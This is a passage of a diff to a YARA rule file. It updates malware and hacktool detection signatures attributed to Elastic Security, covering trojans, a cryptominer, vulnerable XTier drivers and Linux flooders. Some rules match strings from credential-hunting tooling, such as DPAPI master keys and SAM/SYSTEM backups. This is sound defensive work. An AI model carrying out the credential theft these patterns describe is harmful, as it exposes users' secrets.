ascii wide - $win_3 = "Check for services restricted from the outside" ascii wide - $win_4 = "CURRENT USER" ascii wide - $win_5 = "hacktricks.xyz" ascii wide - $win_6 = "SERVICE VULNERABILITIES" ascii wide - $win_7 = "DPAPI MASTER KEYS" ascii wide - $win_8 = "Files in registry that may contain credentials" ascii wide - $win_9 = "SAM and SYSTEM backups" ascii wide + $a = { C0 64 03 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09 8B } condition: - 6 of them + all of them } -rule ELASTIC_Macos_Trojan_Rustbucket_E64F7A92 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Sckit_A244328F : FILE MEMORY { meta: - description = "Detects Macos Trojan Rustbucket (MacOS.Trojan.RustBucket)" + description = "Detects Linux Trojan Sckit (Linux.Trojan.Sckit)" author = "Elastic Security" - id = "e64f7a92-e530-4d0b-8ecb-fe5756ad648c" - date = "2023-06-26" - modified = "2023-06-29" - reference = "https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_RustBucket.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9ca914b1cfa8c0ba021b9e00bda71f36cad132f27cf16bda6d937badee66c747" - logic_hash = "bd6005d72faba6aaeebdcbd8c771995cbfc667faf01eb93825afe985954a47fc" + id = "a244328f-1e12-4ae6-b583-ecf14a4b9d82" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Sckit.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "685da66303a007322d235b7808190c3ea78a828679277e8e03e6d8d511df0a30" + logic_hash = "8001c9fcf9f8b70c3e27554156b0b26ddcd6cab36bf97cf3b89a4c43c9ad883c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f9907f46c345a874b683809f155691723e3a6df7c48f6f4e6eb627fb3dd7904d" + fingerprint = "eca152c730ecabbc9fe49173273199cb37b343d038084965ad880ddba3173f50" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $user_agent = "User-AgentMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" - $install_log = "/var/log/install.log" - $timestamp = "%Y-%m-%d %H:%M:%S" + $a = { 34 D0 04 08 BB 24 C3 04 08 CD 80 C7 05 A0 EE 04 } condition: all of them } -rule ELASTIC_Windows_Trojan_Squirrelwaffle_88033Ff1 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Miancha_646803Ef : FILE MEMORY { meta: - description = "Detects Windows Trojan Squirrelwaffle (Windows.Trojan.Squirrelwaffle)" + description = "Detects Linux Cryptominer Miancha (Linux.Cryptominer.Miancha)" author = "Elastic Security" - id = "88033ff1-f9b1-4cdc-bb68-bd3a10027584" - date = "2021-09-20" - modified = "2022-01-13" + id = "646803ef-e8a5-46e2-94a5-dcc6cb41cead" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Squirrelwaffle.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "00d045c89934c776a70318a36655dcdd77e1fedae0d33c98e301723f323f234c" - logic_hash = "695d7d411a4de23ba1517a06bda3ce73add37dca1e6fe9046e7c2dcae237389e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Miancha.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4c7761c9376ed065887dc6ce852491641419eb2d1f393c37ed0a5cb29bd108d4" + logic_hash = "8fd386c0e7037565e8ab206642cc8c11f05ca727b365b94ffdd991f4bed95556" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "94c0d8ce3e06cf02a6fb57c074ff0ef60346babcde43c61371d099b011d9fcf9" + fingerprint = "b22f87b60c19855c3ac622bc557655915441f5e12c7d7c27c51c05e12c743ee5" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "start /i /min /b start /i /min /b start /i /min /b " ascii fullword - $a2 = " HTTP/1.1" ascii fullword - $a3 = "Host:" ascii fullword - $a4 = "APPDATA" ascii fullword + $a = { 6F DC 66 0F 73 FB 04 66 0F EF C1 66 0F 6F D3 66 0F EF C7 66 0F 6F } condition: all of them } -rule ELASTIC_Windows_Trojan_Squirrelwaffle_D3B685A1 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Xtier_48Bb4B2C : FILE { meta: - description = "Detects Windows Trojan Squirrelwaffle (Windows.Trojan.Squirrelwaffle)" + description = "Name: nscm.sys, Version: 3.1.12.0" author = "Elastic Security" - id = "d3b685a1-2d1c-44a3-8d83-ff661d491a52" - date = "2021-09-21" - modified = "2022-01-13" + id = "48bb4b2c-da6c-4e2a-bbbe-75c7a892bdc6" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Squirrelwaffle.yar#L24-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "00d045c89934c776a70318a36655dcdd77e1fedae0d33c98e301723f323f234c" - logic_hash = "7d187aa75fc767f5009f3090852de4894776f4b3f99f189478e7e9fd9c3acbe7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_XTier.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f" + logic_hash = "fd6ae610a4d2cbf02aae2302d181d07780e723ac7e61b5aa3fd18ba834160729" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "15df7efab9cc40ff57070d18ae67b549c55595d7cbf3ca02963336e4297156c4" - severity = 100 + tags = "FILE" + fingerprint = "bd50e4b3d9999d68574903bd9ec144be7456908658639852480418315903da5b" + threat_name = "Windows.VulnDriver.XTier" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 08 85 C0 75 0F 8D 45 94 50 8D 45 D0 6A 20 50 FF D7 83 C4 0C } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6E 00 73 00 63 00 6D 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Xorddos_2Aef46A6 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Xtier_8A2F6Dc1 : FILE { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Name: libnicm.sys, Version: 3.1.12.0" author = "Elastic Security" - id = "2aef46a6-6daf-4f02-b1b4-e512cea12e53" - date = "2021-01-12" - modified = "2021-09-16" + id = "8a2f6dc1-82f4-4e87-a4d6-49a36ea4fab8" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d2c88774eb5227cf2d133644c648ebe5ba40c7e0acb2b432bc6a1a9da10bfb3f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_XTier.yar#L23-L43" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3" + logic_hash = "90e1efd9d918f15459dd3fabb4737cbdeded66da1d556becca051bdda5867c11" score = 75 - quality = 73 - tags = "FILE, MEMORY" - fingerprint = "e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d" - severity = 100 + quality = 75 + tags = "FILE" + fingerprint = "0142537ba2fa5fa44cf89e0f2126da2b18894115c6152e1f3eaeb759951aba26" + threat_name = "Windows.VulnDriver.XTier" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 25 64 2D 2D 25 73 5F 25 64 3A 25 73 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6C 00 69 00 62 00 6E 00 69 00 63 00 6D 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Xorddos_A6572D63 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Xtier_F4760D4A : FILE { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Name: NICM.SYS, Version: 3.1.12.0" author = "Elastic Security" - id = "a6572d63-f9f3-4dfb-87e6-3b0bafd68a79" - date = "2021-01-12" - modified = "2021-09-16" + id = "f4760d4a-42da-4bb8-87ff-3b2e709c6a95" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L20-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2ff33adb421a166895c3816d506a63dff4e1e8fa91f2ac8fb763dc6e8df59d6e" - logic_hash = "237392fe51c8528cb5ed446facfcd3535b8e1d594d77a542361873bd52426fa7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_XTier.yar#L45-L65" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003" + logic_hash = "dc83771e08b8530bf138782ba8c7724e7ecff40c973407a7f654346302a284d5" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "fd32a773785f847cdd59d41786a8d8a7ba800a71d40d804aca51286d9bb1e1f0" - severity = 100 + tags = "FILE" + fingerprint = "95f3b1f788edb8a6cd121dc44fd1426ff1b29cf3231c6f3f4ec434d288cd8deb" + threat_name = "Windows.VulnDriver.XTier" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C8 0F B6 46 04 0F B6 56 05 C1 E0 08 09 D0 89 45 CC 0F B6 46 06 0F B6 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4E 00 49 00 43 00 4D 00 2E 00 53 00 59 00 53 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Xorddos_E41143E1 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Xtier_6A7De49F : FILE { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Name: NCPL.SYS, Version: 3.1.12.0" author = "Elastic Security" - id = "e41143e1-52d9-45c7-b19f-a5475b18a510" - date = "2021-01-12" - modified = "2021-09-16" + id = "6a7de49f-1a31-4ce0-b4b1-cdc670bfdf18" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L40-L57" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "4564bf2019ff5086071ff147c9cf1e16b8627ce5d70cbe8370aecbd518d94b57" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_XTier.yar#L67-L87" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7" + logic_hash = "de0d25377103d50b33a95a804b9c3eb9ef221d56fa1dfda0a32f14dcd95ee4b1" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "f621a2e8c289772990093762f371bb6d5736085695881e728a0d2c013c2ad1d4" - severity = 100 + tags = "FILE" + fingerprint = "fb012fd29d00b1dc06353ebfff62d29cc9d86549d8af10b049213256cbcab09e" + threat_name = "Windows.VulnDriver.XTier" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 73 1E 80 3C 06 00 8D 14 30 8D 4C 37 FF 74 0D EB 36 0F B6 42 01 83 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 4E 00 43 00 50 00 4C 00 2E 00 53 00 59 00 53 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x0c][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x02][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x0b][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Xorddos_0Eb147Ca : FILE MEMORY +rule ELASTIC_Windows_Trojan_Eagerbee_7029Ba21 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Windows Trojan Eagerbee (Windows.Trojan.EagerBee)" author = "Elastic Security" - id = "0eb147ca-ec6d-4a6d-b807-4de8c1eff875" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L59-L77" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b" - logic_hash = "b20479af0767e5e8579489b5298648b9cc84b3e0778f58d8dc9deb252d0f4806" + id = "7029ba21-12ea-4120-911b-a36c4002409e" + date = "2023-05-09" + modified = "2023-06-13" + reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_EagerBee.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "09005775fc587ac7bf150c05352e59dc01008b7bf8c1d870d1cea87561aa0b06" + logic_hash = "874959361b14ba74e13e6e674da75c9bdb6b9475d8b286572825c940b41f679f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955" + fingerprint = "26d0d10f7c503e284e2b24a9e273f880d2e152348dfdd44fb3fc8cb10aa57e2a" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 } + $a1 = { C2 EB D6 0F B7 C2 48 8D 0C 80 41 8B 44 CB 14 41 2B 44 CB 0C 41 } + $a2 = { C8 75 04 33 C0 EB 7C 48 63 41 3C 8B 94 08 88 00 00 00 48 03 D1 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_884Cab60 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Eagerbee_A64B323B : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Windows Trojan Eagerbee (Windows.Trojan.EagerBee)" author = "Elastic Security" - id = "884cab60-214f-4879-aa51-c00de1a5ffc4" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L79-L96" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "139c5c1c3816047b595deb6a8873b2964e91393642b93536cd102af9a6033e7c" + id = "a64b323b-60b6-49b9-99d2-82a336fe304e" + date = "2023-09-04" + modified = "2023-09-20" + reference = "https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_EagerBee.yar#L23-L45" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "339e4fdbccb65b0b06a1421c719300a8da844789a2016d58e8ce4227cb5dc91b" + logic_hash = "e1c25cf8ce0ff434727c9104c6b79110ff5cfa84eb3e939119fd05cf676727c6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72" + fingerprint = "5109ec213a2ac1a1d920f3a9753bed97d038b226775996002511df5dc0b6de9c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 } + $dexor_config_file = { 48 FF C0 8D 51 FF 44 30 00 49 03 C4 49 2B D4 ?? ?? 48 8D 4F 01 48 } + $parse_config = { 80 7C 14 20 3A ?? ?? ?? ?? ?? ?? 45 03 C4 49 03 D4 49 63 C0 48 3B C1 } + $parse_proxy1 = { 44 88 7C 24 31 44 88 7C 24 32 48 F7 D1 C6 44 24 33 70 C6 44 24 34 3D 88 5C 24 35 48 83 F9 01 } + $parse_proxy2 = { 33 C0 48 8D BC 24 F0 00 00 00 49 8B CE F2 AE 8B D3 48 F7 D1 48 83 E9 01 48 8B F9 } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Xorddos_Ba961Ed2 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Exploitscan_4327F817 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Exploitscan (Linux.Hacktool.Exploitscan)" author = "Elastic Security" - id = "ba961ed2-b410-4da5-8452-a03cf5f59808" + id = "4327f817-cb11-480f-aba7-4d5170c77758" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L98-L116" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b" - logic_hash = "5b486c698c9c61dc126be5dbeea862b1f9bb5a6859c02a0fff125a9890147a6b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Exploitscan.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "66c6d0e58916d863a1a973b4f5cb7d691fbd01d26b408dbc8c74f0f1e4088dfb" + logic_hash = "7797d9bd75dff355e1ee84b856e77cf9e886dfe727fb8ce7a6fdbe5ed1eb0985" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa" + fingerprint = "3f70c8ef8f20f763dcada4353c254fe1df238829ce590fb87c279d8a892cf9c4" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64927,27 +65825,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_Ba961Ed2 : FILE MEMORY os = "linux" strings: - $a = { F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF } + $a = { 24 08 8B 4C 24 0C 85 C0 74 20 8B 58 20 84 03 83 C3 10 8B 68 24 89 9C 24 DC 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_2084099A : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_825B6808 : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "2084099a-1df6-4481-9d13-3a5bd6a53817" + id = "825b6808-9b23-4a55-9f26-a34cab6ea92b" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L118-L135" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "6674be1438ec290550c9586afda335755279a4aedadde455ffc0b41d1a0e634d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7db9a0760dd16e23cb299559a0e31a431b836a105d5309a9880fa4b821937659" + logic_hash = "f5f997d8401f1505e81072dcb0e24ad7a78f0b56133698b70d8dd93ef25ddaf3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b" + fingerprint = "e2db86e614b9bc0de06daf626abe652cc6385cca8ba96a2f2e394cf82be7a29b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64955,28 +65854,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_2084099A : FILE MEMORY os = "linux" strings: - $a = { 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0 } + $a = { 10 83 EC 04 8B 45 E4 FF 70 0C 8D 45 E8 83 C0 04 50 8B 45 E4 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_61C88137 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_A44Ab8Cd : FILE MEMORY { meta: - description = "Detects Linux Trojan Xorddos (Linux.Trojan.Xorddos)" + description = "Detects Linux Hacktool Flooder (Linux.Hacktool.Flooder)" author = "Elastic Security" - id = "61c88137-02f6-4339-b8fc-04c72a5023aa" - date = "2022-09-12" - modified = "2022-10-18" + id = "a44ab8cd-c45e-4fe8-b96d-d4fe227f3107" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Xorddos.yar#L137-L155" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "479ef38fa00bb13a3aa8448aa4a4434613c6729975e193eec29fc5047f339111" - logic_hash = "e999355606ee7389be160ce3e96c6a62d7f9132b95cfec7d9f8b1a670551e6b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Flooder.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4b2068a4a666b0279358b8eb4f480d2df4c518a8b4518d0d77c6687c3bff0a32" + logic_hash = "a0501f76aff532366292189d34a57844ba999748b94f349be2f391dfd96e2106" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c09b31424a54e485fe5f89b4ab0a008df6e563a75191f19de12113890a4faa39" + fingerprint = "0d77547064aeca6714ede98df686011c139ca720a71bcac23e40b0c02d302d6a" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64984,28 +65883,28 @@ rule ELASTIC_Linux_Trojan_Xorddos_61C88137 : FILE MEMORY os = "linux" strings: - $a = { 24 8B C1 8B 0C 24 8D 64 24 FC 89 0C 24 8B 4D E8 87 0C 24 96 8D 64 } + $a = { E0 03 48 89 45 A8 8B 45 BC 48 63 D0 48 83 EA 01 48 89 55 A0 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Xorddos_Debb98A1 : FILE MEMORY +rule ELASTIC_Linux_Hacktool_Flooder_7026F674 : FILE MEMORY { meta: - description = "Detects 